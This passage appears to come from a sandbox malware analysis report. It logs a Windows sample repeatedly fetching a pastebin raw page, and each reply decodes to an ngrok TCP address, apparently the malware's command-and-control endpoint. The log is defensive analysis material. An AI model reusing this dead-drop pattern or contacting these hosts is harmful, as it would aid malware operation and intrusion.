                                                                    2024-05-02 04:03:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    36192.168.2.449809104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:03:32 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:03:33 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:03:33 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 146
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51f4448fd437b-EWR
                                                                    2024-05-02 04:03:33 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:03:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    37192.168.2.449811104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:03:37 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:03:37 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:03:37 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 150
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51f5ebec3c335-EWR
                                                                    2024-05-02 04:03:37 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:03:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    38192.168.2.449813104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:03:42 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:03:43 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:03:42 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 155
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51f81aa9f0f8b-EWR
                                                                    2024-05-02 04:03:43 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:03:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    39192.168.2.449815104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:03:46 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:03:47 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:03:47 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 160
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51f9b6b908cc6-EWR
                                                                    2024-05-02 04:03:47 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:03:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    40192.168.2.449817104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:03:50 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:03:51 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:03:51 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 164
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51fb4a9e39e16-EWR
                                                                    2024-05-02 04:03:51 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:03:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    41192.168.2.449819104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:03:54 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:03:55 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:03:55 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 168
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51fcdcec1c46b-EWR
                                                                    2024-05-02 04:03:55 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:03:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    42192.168.2.449821104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:03:58 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:03:59 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:03:59 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 172
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51fe68b8b729b-EWR
                                                                    2024-05-02 04:03:59 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:03:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    43192.168.2.449823104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:04:03 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:04:03 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:04:03 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 176
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d5200269bf18c4-EWR
                                                                    2024-05-02 04:04:03 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:04:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    44192.168.2.449825104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:04:07 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:04:07 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:04:07 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 180
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d5201c2e2a440d-EWR
                                                                    2024-05-02 04:04:07 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:04:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    45192.168.2.449827104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:04:11 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:04:11 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:04:11 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 184
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d520344a2442da-EWR
                                                                    2024-05-02 04:04:11 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:04:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    46192.168.2.449829104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:04:15 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:04:15 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:04:15 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 188
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d5204c2a420dc7-EWR
                                                                    2024-05-02 04:04:15 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:04:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    47192.168.2.449831104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:04:19 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:04:19 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:04:19 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 192
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d520653fb978d6-EWR
                                                                    2024-05-02 04:04:19 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:04:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    48192.168.2.449833104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:04:23 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:04:23 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:04:23 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 196
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d5207d2e104372-EWR
                                                                    2024-05-02 04:04:23 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:04:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    49192.168.2.449835104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:04:26 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:04:26 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:04:26 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 199
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d52094491b0f84-EWR
                                                                    2024-05-02 04:04:26 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:04:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    50192.168.2.449837104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:04:30 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:04:30 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:04:30 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 203
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d520ab7e5d4304-EWR
                                                                    2024-05-02 04:04:30 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:04:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    51192.168.2.449839104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:04:34 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:04:34 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:04:34 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 207
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d520c51eea4393-EWR
                                                                    2024-05-02 04:04:34 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:04:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    52192.168.2.449841104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:04:38 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:04:38 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:04:38 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 211
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d520ddeee08c8d-EWR
                                                                    2024-05-02 04:04:38 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:04:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    53192.168.2.449843104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:04:42 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:04:42 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:04:42 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 215
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d520f4789b7cf0-EWR
                                                                    2024-05-02 04:04:42 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:04:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    54192.168.2.449845104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:04:45 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:04:45 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:04:45 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 218
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d5210b2cf24234-EWR
                                                                    2024-05-02 04:04:45 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:04:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    55192.168.2.449847104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:04:49 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:04:49 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:04:49 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 222
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d52121595c43b5-EWR
                                                                    2024-05-02 04:04:49 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:04:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    56192.168.2.449849104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:04:52 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:04:53 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:04:53 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 226
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d5213769da15cb-EWR
                                                                    2024-05-02 04:04:53 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:04:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    57192.168.2.449851104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:04:56 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:04:56 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:04:56 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 229
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d5214d7e5c424c-EWR
                                                                    2024-05-02 04:04:56 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:04:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    58192.168.2.449853104.20.3.235443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:04:59 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:05:00 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:05:00 GMT
                                                                    Content-Type: text/plain; charset=utf-8
